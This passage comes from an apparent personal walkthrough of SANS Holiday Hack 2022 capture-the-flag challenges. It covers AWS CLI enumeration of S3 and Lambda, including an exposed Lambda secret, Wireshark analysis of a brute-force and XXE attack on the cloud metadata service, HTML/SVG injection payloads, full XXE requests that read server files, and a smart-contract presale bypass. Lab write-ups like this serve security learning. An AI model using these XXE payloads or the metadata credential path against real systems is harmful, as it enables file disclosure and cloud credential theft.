                    ]
                }
            ]
        }
    },
    "IsTruncated": false
}
elf@dd1ea5c9dd6e:~/test$ 
  1. The inline user policy named S3Perms disclosed the name of an S3 bucket that you have permissions to list objects. List those objects! The aws s3api command to list objects in an s3 bucket can be found here: https://awscli.amazonaws.com/v2/documentation/api/latest/reference/s3api/index.html
elf@dd1ea5c9dd6e:~/test$ aws s3api list-objects --bucket "smogmachines3"
───────────────────────────────────────────────────────────────────────────────────────────────
        },
        {
            "Key": "smog-power-station.jpg",
            "LastModified": "2022-09-23 20:40:46+00:00",
            "ETag": "\"0e69b8d53d97db0db9f7de8663e9ec09\"",
            "Size": 32498,
            "StorageClass": "STANDARD",
            "Owner": {
                "DisplayName": "grinchum",
                "ID": "15f613452977255d09767b50ac4859adbb2883cd699efbabf12838fce47c5e60"
            }
        },
        {
            "Key": "smogmachine_lambda_handler_qyJZcqvKOthRMgVrAJqq.py",
            "LastModified": "2022-09-26 16:31:33+00:00",
            "ETag": "\"fd5d6ab630691dfe56a3fc2fcfb68763\"",
            "Size": 5823,
            "StorageClass": "STANDARD",
            "Owner": {
                "DisplayName": "grinchum",
                "ID": "15f613452977255d09767b50ac4859adbb2883cd699efbabf12838fce47c5e60"
            }
        }
    ],
    "Name": "smogmachines3",
    "Prefix": "",
    "MaxKeys": 1000,
    "EncodingType": "url"
}
elf@dd1ea5c9dd6e:~/test$ 

8 . The attached user policy provided you several Lambda privileges. Use the AWS CLI to list Lambda functions. The aws lambda command to list functions can be found here: https://awscli.amazonaws.com/v2/documentation/api/latest/reference/lambda/index.html

elf@dd1ea5c9dd6e:~/test$ aws lambda list-functions
───────────────────────────────────────────────────────────────────────────────────────────────
elf@dd1ea5c9dd6e:~/test$ aws lambda list-functions|head
{
    "Functions": [
        {
            "FunctionName": "smogmachine_lambda",
            "FunctionArn": "arn:aws:lambda:us-east-1:602123424321:function:smogmachine_lambda",
            "Runtime": "python3.9",
            "Role": "arn:aws:iam::602123424321:role/smogmachine_lambda",
            "Handler": "handler.lambda_handler",
            "CodeSize": 2126,
            "Description": "",
elf@dd1ea5c9dd6e:~/test$ 
[AWS 201] 0:AWS 201*                                             "dd1ea5c9dd6e" 06:24 12-Dec-22
                "VpcId": "vpc-85ea8596648f35e00"
            },
            "Environment": {
                "Variables": {
                    "LAMBDASECRET": "975ceab170d61c75",
                    "LOCALMNTPOINT": "/mnt/smogmachine_files"
                }
            },
            "TracingConfig": {
                "Mode": "PassThrough"
            },
            "RevisionId": "7e198c3c-d4ea-48dd-9370-e5238e9ce06e",
            "FileSystemConfigs": [
                {
                    "Arn": "arn:aws:elasticfilesystem:us-east-1:602123424321:access-point/fsap-db3277b03c6e975d2",
                    "LocalMountPath": "/mnt/smogmachine_files"
                }
            ],
            "PackageType": "Zip",
            "Architectures": [
                "x86_64"
            ],
            "EphemeralStorage": {
                "Size": 512
            }
        }
    ]
}
elf@dd1ea5c9dd6e:~/test$ 

9 . Lambda functions can have public URLs from which they are directly accessible. Use the AWS CLI to get the configuration containing the public URL of the Lambda function. The aws lambda command to get the function URL config can be found here: https://awscli.amazonaws.com/v2/documentation/api/latest/reference/lambda/index.html

elf@dd1ea5c9dd6e:~/test$ aws lambda get-function-url-config --function-name smogmachine_lambda
{
    "FunctionUrl": "https://rxgnav37qmvqxtaksslw5vwwjm0suhwc.lambda-url.us-east-1.on.aws/",
    "FunctionArn": "arn:aws:lambda:us-east-1:602123424321:function:smogmachine_lambda",
    "AuthType": "AWS_IAM",
    "Cors": {
        "AllowCredentials": false,
        "AllowHeaders": [],
        "AllowMethods": [
            "GET",
            "POST"
        ],
        "AllowOrigins": [
            "*"
        ],
        "ExposeHeaders": [],
        "MaxAge": 0
    },
    "CreationTime": "2022-09-07T19:28:23.808713Z",
    "LastModifiedTime": "2022-09-07T19:28:23.808713Z"
}
elf@dd1ea5c9dd6e:~/test$ 

Web Ring

Naughty IP

The first attack is a brute force login. What’s the first username tried?

From the hint, Wireshark > Statistics > Conversations (sort by most bytes first), 18.222.86.32 has the most requests and seems suspicious.

Credential Mining

The first attack is a brute force login. What’s the first username tried?

Apply filter ip.src == 18.222.86.32 and http and http.request.method == POST and sort by requests. The smallest packet number is 7279, and the username/password are “alice/philip”.

404 FTW

The next attack is forced browsing where the naughty one is guessing URLs. What’s the first successful URL path in this attack?

First apply filter ip.src == 18.222.86.32 and http and http.request.method == GET to see where the forced browsing starts - the first instance is for http://www.toteslegit.us/0 at frame 24475.

So we modify the filter to where 18.222.86.32 receives a successful response (200) and the frame number is larger to get a result of /proc. ip.dst == 18.222.86.32 and http and http.response.code == 200 and frame.number >= 24475

IMDS, XXE and Other Abbreviations

The last step in this attack was to use XXE to get secret keys from the IMDS service. What URL did the attacker force the server to fetch?

From the hint (https://www.sans.org/blog/cloud-instance-metadata-services-imds-/), IMDS listens on 169.254.169.254 so we want to find when the victim server (10.12.42.16) receives a successful response from IMDS, and the text includes credentials. Apply filter ip.src_host == 169.254.169.254 and http.response.code == 200, that brings back four records. Reading the HTTP response text, only pframe number 32925 contains credentials, and the url is http://169.254.169.254/latest/meta-data/identity-credentials/ec2/security-credentials/ec2-instance.

Open Boria Mine Door

Just use burp to send all these as inputTxt to the webapp.

POST /pin1 HTTP/2
Host: hhc22-novel.kringlecon.com
inputTxt=@&@&&W&&W&&&&

<!-- TODO: FILTER OUT HTML FROM USER INPUT -->

POST /pin2 HTTP/2
Host: hhc22-novel.kringlecon.com

inputTxt=<html><body style="background-color:white;"></html>

POST /pin3 HTTP/2
Host: hhc22-novel.kringlecon.com

inputTxt=<html><body onload="document.body.style.backgroundColor = blue;"></html>
<svg version="1.1" width="100%" height="100%">
  <rect fill="#0000FF" width="100%" height="100%"/>
</svg>

##4
<svg version=1.1 width="100%" height="500">
  <line width="100%" height="100%" x1="0" y1="45" x2="200" y2="45" stroke="white" stroke-width="15"/>
  <line width="100%" height="100%" x1="0" y1="135" x2="200" y2="135" stroke="blue" stroke-width="15"/>
</svg>

##5
<svg version=1.1 width="100%" height="500">
  <line width="100%" height="100%" x1="0" y1="135" x2="200" y2="45" stroke="red" stroke-width="15"/>
  <line width="100%" height="100%" x1="0" y1="200" x2="200" y2="85" stroke="blue" stroke-width="15"/>
</svg>

##6 
<svg version=1.1 width="100%" height="500">
  <line width="100%" height="100%" x1="0" y1="30" x2="200" y2="30" stroke="#00ff00" stroke-width="15"/>
  <line width="100%" height="100%" x1="0" y1="75" x2="200" y2="110" stroke="red" stroke-width="15"/>
  <line width="100%" height="100%" x1="0" y1="115" x2="200" y2="200" stroke="blue" stroke-width="15"/>
</svg>

Glamtariel’s Fountain

POST /dropped HTTP/2
Host: glamtarielsfountain.com
Cookie: MiniLembanh=e647091d-8815-46a1-8524-62d32abaff6f.4R_HY7-t_k7Yfmj7-Uy8PGE2v7E; GCLB="87ef1373d0f1cf3a"
Content-Length: 206
Sec-Ch-Ua: "Not?A_Brand";v="8", "Chromium";v="108"
Accept: application/xml
Content-Type: application/xml
X-Grinchum: ImVlNzQwMWMzODI4ZGRjNjc5YTVkYTg4ZDMwMzkxN2ZhM2I5YmM1MmQi.Y7pz8A.mxVn4ZZIfH3mTy_q3wGOuDASSRo
Sec-Ch-Ua-Mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.5359.125 Safari/537.36
Sec-Ch-Ua-Platform: "macOS"
Origin: https://glamtarielsfountain.com
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: https://glamtarielsfountain.com/
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9

<!--?xml version="1.0" ?-->
<!DOCTYPE replace [<!ENTITY ent SYSTEM "file:///app/static/images/ringlist.txt"> ]>
<root>
  <imgDrop>&ent;</imgDrop>
  <who>princess</who>
  <reqType>xml</reqType>
</root>

{
  "appResp": "Ah, you found my ring list! Gold, red, blue - so many colors! Glad I don't keep any secrets in it any more! Please though, don't tell anyone about this.^She really does try to keep things safe. Best just to put it away. (click)",
  "droppedOn": "none",
  "visit": "static/images/pholder-morethantopsupersecret63842.png,262px,100px"
}

/x_phial_pholder_2022/ringlist.txt (see redring.txt & bluering.txt & you try silverring.txt)
hint from the defiled red ring

POST /dropped HTTP/2
Host: glamtarielsfountain.com
Cookie: GCLB="efc0d6e10858cbd4"; MiniLembanh=f6b0f2c0-875e-4792-a308-f606d81ba812.MVOtULSE3IvNpyJUfSpqn2U3p5M
Content-Length: 230
Sec-Ch-Ua: "Not?A_Brand";v="8", "Chromium";v="108"
Accept: application/json
Content-Type: application/xml
X-Grinchum: ImM2NjcwZWJmMTRkNmExODY2ZGEyZGUzM2FiMWFiMjI2ZTJkZDkyZDgi.Y7sArg.nUhUyjErFQlJWtGa7f1_Y9AN4Ao
Sec-Ch-Ua-Mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.5359.125 Safari/537.36
Sec-Ch-Ua-Platform: "macOS"
Origin: https://glamtarielsfountain.com
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: https://glamtarielsfountain.com/
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9

<!--?xml version="1.0" ?-->
<!DOCTYPE replace [<!ENTITY ent SYSTEM "file:///app/static/images/x_phial_pholder_2022/goldring_to_be_deleted.txt"> ]>
<root>
  <imgDrop>&ent;</imgDrop>
  <who>princess</who>
  <reqType>xml</reqType>
</root>

response:
{
  "appResp": "Hmmm, and I thought you wanted me to take a look at that pretty silver ring, but instead, you've made a pretty bold REQuest. That's ok, but even if I knew anything about such things, I'd only use a secret TYPE of tongue to discuss them.^She's definitely hiding something.",
  "droppedOn": "none",
  "visit": "none"
}
i was pretty much stuck here... had to ask for help in the discord because I couldnt understand what to do next... after some helpful hints (REQ TYPE) I tried something that worked.

POST /dropped HTTP/2
Host: glamtarielsfountain.com
Cookie: GCLB="efc0d6e10858cbd4"; MiniLembanh=f6b0f2c0-875e-4792-a308-f606d81ba812.MVOtULSE3IvNpyJUfSpqn2U3p5M
Content-Length: 230
Sec-Ch-Ua: "Not?A_Brand";v="8", "Chromium";v="108"
Accept: application/json
Content-Type: application/xml
X-Grinchum: ImM2NjcwZWJmMTRkNmExODY2ZGEyZGUzM2FiMWFiMjI2ZTJkZDkyZDgi.Y7sArg.nUhUyjErFQlJWtGa7f1_Y9AN4Ao
Sec-Ch-Ua-Mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.5359.125 Safari/537.36
Sec-Ch-Ua-Platform: "macOS"
Origin: https://glamtarielsfountain.com
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: https://glamtarielsfountain.com/
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9

<!--?xml version="1.0" ?-->
<!DOCTYPE replace [<!ENTITY ent SYSTEM "file:///app/static/images/x_phial_pholder_2022/goldring_to_be_deleted.txt"> ]>
<root>
  <imgDrop>img1</imgDrop>
  <who>princess</who>
  <reqType>&ent;</reqType>
</root>

Blockchain Divination

Goto block #1

Transaction 0 This transaction creates a contract. “KringleCoin” Contract Address: 0xc27A2D3DE339Ce353c0eFBa32e948a88F1C86554

Exploit Smart Contract

Here's all you gotta do to pre-purchase your Sporc:

The presale price for a Sporc is 100 KringleCoin (KC). Yeah, we know that's crazy cheap, but we take care of our buds. When we open sales to the public, these things are gonna shoot to the moon.
First, you're gonna want to make sure that your wallet address is on the approved list. Just make sure to leave the "Validate only" box checked, fill in the form, and we'll let you know if you're good-to-go. Before you do anything else, it's always good to be sure you're doing everything right and your address is validated as being on the list (it's actually something called a Merkle Tree... very high-techy-techy stuff).
To check if you're on the list, enter your wallet address and the string of proof values that we gave you when we told you that you were on the pre-approved list. Those values should be hex strings (i.e. start with "0x" and consist of a bunch of values that are 0-9 or "a," "b," "c," "d," "e," or "f"). If you're confused, give us a shout and we can help.
If you're not on the presale list, you're not on the list. Don't beg and plead with us to put you on the list. Seriously - we've only put Sporcs that we're tight with on the list. WE decided who's on the list (COOL SPORCS ONLY). We don't just let anyone on. If we were putting you on the list, we would've contacted you... not the other way around.
Once you've confirmed everything works and you're sure you have the whole validated-and-on-the-list thing down, just go find a KTM and pre-approve a 100 KC transaction from the wallet you validated. That way, the funds are ready to go. Our Wallet Address is 0xe8fC6f6a76BE243122E3d01A1c544F87f1264d3a.
Once you've pre-approved the payment, come back here do the same thing you did when you validated your address, just uncheck the "Validate Only" thing. Then, we'll grab your K'Coin, mint a brand spankin' new Sporc, and fire it into your wallet. Zap! Just like that, you'll be the owner of an amazing piece of the digital domain and a member of the Bored Sporc Rowboat Society for life! (Or, until you decide to cash-out and sell your Bored Sporc).

tldr: use the script in the repo add key and some other bs, alter the script to utilize your key in the array and execute it

request

POST /cgi-bin/presale HTTP/2
Host: boredsporcrowboatsociety.com
Cookie: GCLB="20bc124b2ffafbba"
Content-Length: 416
Sec-Ch-Ua: "Not?A_Brand";v="8", "Chromium";v="108"
Sec-Ch-Ua-Platform: "macOS"
Sec-Ch-Ua-Mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.5359.125 Safari/537.36
Content-Type: application/json
Accept: */*
Origin: https://boredsporcrowboatsociety.com
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: https://boredsporcrowboatsociety.com/presale.html?&challenge=bsrs
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9


{"WalletID":"0xF44D208f9AB692E8f7b4c284cxxxxx","Root":"0x591aa07ea28433368fbeff2bxxxxx","Proof":"0x2ab0a4443bbea3fbe4d0e1503d11ff1367842fb0c8b28a5c85xxxx,0xe53833745f812dbbffd118a573b4b380aae6b82afd4839d67dd7a2f8xxx,0xab642276d45d87c4c538fea27c78e9fae2b6f5d3505d3f108d480xxx","Validate":"false","Session":"f66dcca9-fb1d-4eb0-b36b-439232cc60e2"}

response

HTTP/2 200 OK
Server: nginx/1.23.2
Date: Mon, 09 Jan 2023 08:26:18 GMT
Content-Type: application/json
Via: 1.1 google
Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000

{"Response": "Success! You are now the proud owner of BSRS Token #000712. You can find more information at https://boredsporcrowboatsociety.com/TOKENS/BSRS712, or check it out in the gallery!<br>Transaction: 0xb7a84fccc69d212800f796f187d29424e1e367cd4580c735cxxxx, Block: 109839<br><br>Remember: Just like we planned, tell everyone you know to <u><em>BUY A BoredSporc</em></u>.<br>When general sales start, and the humans start buying them up, the prices will skyrocket, and we all sell at once!<br><br>The market will tank, but we'll all be rich!!!"}

viola:

https://boredsporcrowboatsociety.com/TOKENS/TOKENIMAGES/BSRS712.png